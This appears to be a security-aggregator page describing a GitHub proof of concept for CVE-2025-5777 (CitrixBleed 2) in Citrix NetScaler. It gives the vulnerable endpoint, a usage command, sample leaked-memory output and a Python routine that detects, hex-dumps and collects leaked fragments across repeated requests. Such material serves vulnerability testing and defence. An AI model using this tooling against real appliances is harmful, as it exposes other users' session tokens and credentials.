Citrix NetScaler Memory Leak Vulnerability

Vulnerability Information

Vulnerability name: Citrix NetScaler Memory Leak Vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-5777

Vulnerability type: Information disclosure

Severity: High

Vulnerability description: Citrix NetScaler ADC/Gateway is a widely deployed enterprise application delivery controller and gateway appliance, used to optimize and accelerate application delivery while providing security and reliability. It usually sits at the network edge as a critical piece of infrastructure. CVE-2025-5777, nicknamed CitrixBleed 2, is an information-disclosure vulnerability: a crafted request to the HTTP endpoint /p/u/doAuthentication.do makes the appliance return uninitialized memory in its response, and that memory may contain XML fragments, tokens and even credentials. ("Memory leak" here means disclosure of appliance memory to the client, not a resource leak.) The root cause is that the appliance fails to initialize or clear the memory it uses while handling such a request. An attacker can retrieve this data remotely without authentication and use it for follow-on attacks such as session or identity impersonation and data theft. Because NetScaler ADC/Gateway is so widely deployed, the impact is broad and may pose a serious threat to organizations that rely on these devices.

Vendor: Citrix

Product: Citrix NetScaler ADC/Gateway

Source: https://github.com/0xgh057r3c0n/CVE-2025-5777

Type: CVE-2025:github search

Repository files

  • .gitignore
  • CVE-2025-5777.py
  • CVE-2025-5777.yaml
  • LICENSE
  • README.md

Source overview

CVE-2025-5777 - Citrix NetScaler Memory Leak PoC

📌 Description

This script exploits a critical memory disclosure vulnerability in Citrix NetScaler ADC/Gateway appliances, identified as CVE-2025-5777 (dubbed CitrixBleed 2). It triggers a memory leak through the /p/u/doAuthentication.do endpoint, revealing uninitialized memory containing sensitive data such as XML fragments, tokens, and potentially credentials.

  • 📅 CVE ID: CVE-2025-5777
  • ⚙️ Impact: Information Disclosure
  • 🧑‍💻 Author: [0xgh057r3c0n]
  • 🧵 Concurrency: Asynchronous with aiohttp
  • 📦 Dependencies: aiohttp, colorama

🚀 Features

  • Asynchronous mass-request engine using asyncio + aiohttp
  • Hex dump of leaked memory fragments
  • Auto-detection of the <InitialValue> memory leak
  • Verbose mode for debugging and response preview
  • Graceful interrupt handling (Ctrl+C)

🧪 Usage

python3 CVE-2025-5777.py http://<target> [options]

🔧 Options

Option           Description
-v, --verbose    Enable verbose debug output
-p <proxy>       Use HTTP proxy (e.g., http://127.0.0.1:8080)
-t <threads>     Number of concurrent requests (default: 10)

📥 Example

python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5

📤 Sample Output

[ASCII-art banner]

Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------

[✔️ ] Leak confirmed. Continuing extraction...
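The Features list and the sample output above describe two things the script does with each response: decide whether the <InitialValue> element carries leaked bytes, and render those bytes as an offset/hex/ASCII dump. The block below is an added example written for this page, not code from the 0xgh057r3c0n repository, showing that response-side logic in plain Python with no network access. It deliberately does not construct the trigger request (the page does not specify the request body), and it assumes, as the PoC's own heuristic does, that a non-empty <InitialValue> indicates leaked memory; the sample responses are constructed test data in an assumed minimal XML shape, not captured traffic. It also goes one step beyond the page by de-duplicating fragments across repeated responses, since each request returns whatever happened to sit in memory at that moment.

```python
import re

# Match over raw bytes: leaked memory need not be valid UTF-8, so the
# response body is handled as bytes end to end.
INITIAL_VALUE_RE = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.DOTALL)


def find_leaks(body: bytes) -> list:
    """Return the contents of every non-empty <InitialValue> element.

    Assumption (the PoC's own detection heuristic, not a vendor statement):
    on an unaffected appliance the element is empty, so any bytes inside it
    are treated as leaked memory.
    """
    return [m for m in INITIAL_VALUE_RE.findall(body) if m]


def hexdump(data: bytes, width: int = 16) -> list:
    """Render bytes as 'offset: hex bytes  printable-ASCII' rows."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{off:08x}: {hexpart:<{width * 3 - 1}}  {text}")
    return lines


def unique_fragments(bodies) -> list:
    """Collect distinct leaked fragments across many responses, in order seen.

    Each request returns a different slice of memory, so the PoC repeats the
    request and accumulates output; duplicates are dropped here so the
    operator only reviews new material.
    """
    seen = set()
    out = []
    for body in bodies:
        for frag in find_leaks(body):
            if frag not in seen:
                seen.add(frag)
                out.append(frag)
    return out


def report(body: bytes) -> bool:
    """Print a PoC-style verdict for one response; True if a leak was found."""
    leaks = find_leaks(body)
    if not leaks:
        print("[-] No InitialValue leak in this response")
        return False
    print("[+] Found InitialValue Memory Leak!")
    for frag in leaks:
        print("[*] Hex Dump:")
        print("-" * 72)
        print("\n".join(hexdump(frag)))
        print("-" * 72)
    return True


# Constructed sample responses (assumed minimal shape, not captured traffic).
CLEAN_RESPONSE = b"<Input><Text><InitialValue></InitialValue></Text></Input>"
LEAKED_RESPONSE = (
    b"<Input><Text><InitialValue>"
    b'secret="abcd123!@#$%^&*()"'
    b"</InitialValue></Text></Input>"
)
# A fragment with non-printable bytes, to show the '.' substitution.
LEAKED_RESPONSE_2 = (
    b"<Input><Text><InitialValue>"
    b"tok\x00\xff\x01"
    b"</InitialValue></Text></Input>"
)

if __name__ == "__main__":
    report(CLEAN_RESPONSE)
    report(LEAKED_RESPONSE)
    frags = unique_fragments([LEAKED_RESPONSE, LEAKED_RESPONSE, LEAKED_RESPONSE_2])
    print(f"[i] {len(frags)} distinct fragment(s) collected across 3 responses")
```

Anything this returns is live appliance memory and may include other users' session material, so store and share dumps with the same care as the credentials they might contain, and only against systems you are authorized to test.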

⚠️ Disclaimer

This proof-of-concept is intended for educational and authorized security testing only.
Unauthorized scanning or exploitation of systems you don’t own is illegal.

http://example.com/2025/07/10/github_4229579416/
Author
lianccc
Published
July 10, 2025
License